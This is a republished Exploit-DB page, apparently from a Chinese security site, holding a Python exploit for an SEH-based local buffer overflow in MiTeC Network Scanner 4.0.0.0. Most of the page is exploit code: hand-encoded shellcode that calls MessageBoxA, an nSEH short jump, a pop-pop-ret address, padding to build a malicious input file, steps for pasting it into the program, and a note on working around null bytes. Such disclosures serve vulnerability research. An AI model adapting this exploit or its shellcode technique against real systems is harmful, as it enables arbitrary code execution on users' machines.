首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Network Scanner 4.0.0 - SEH Local Buffer Overflow
来源:https://www.exploit-db.com 作者:n30m1nd 发布时间:2016-10-26  

#!/usr/bin/python
# -*- coding: utf-8 -*-

### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###

# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
#  https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time

# Exploit code
# ============

import struct

# MessageBoxA in NetScan.exe => 004042F1
mbox = (
  "\x25\x41\x41\x41"
  "\x41\x25\x32\x32"
  "\x32\x32\x50\x68"
  "\x70\x77\x6E\x64"
  "\x54\x5F\x50\x57"
  "\x57\x50\x35\x8E"
  "\x60\x60\x55\x35"
  "\x7F\x22\x20\x55"
  "\x50\xC3"
  )
# JUMP BACK to our shellcode!
nseh = (
        # xor al,51h;  Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
        "\x34\x51"
        # jne -32h;  Jump if ZF = 0
        "\x75\xCC"
        )
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)

payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh

with open("exploit.txt","wb") as f:
 f.write(payl[:-1])
print payl

"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows x86 NDISTAPI
·WSearch service (windows) - pe
·Panda Security PSEvents Privil
·SmallFTPd 1.0.3 - 'mkd' Comman
·WordPress Userpro Remote File
·Komfy Switch with Camera DKZ-2
·Deluge 1.3.13 - Denial Of Serv
·GNU GTypist 2.9.5-2 - Local Bu
·TrendMicro InterScan Web Secur
·uSQLite 1.0.0 - Denial Of Serv
·Oracle VM VirtualBox 4.3.28 -
·CherryTree 0.36.9 - Memory Cor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved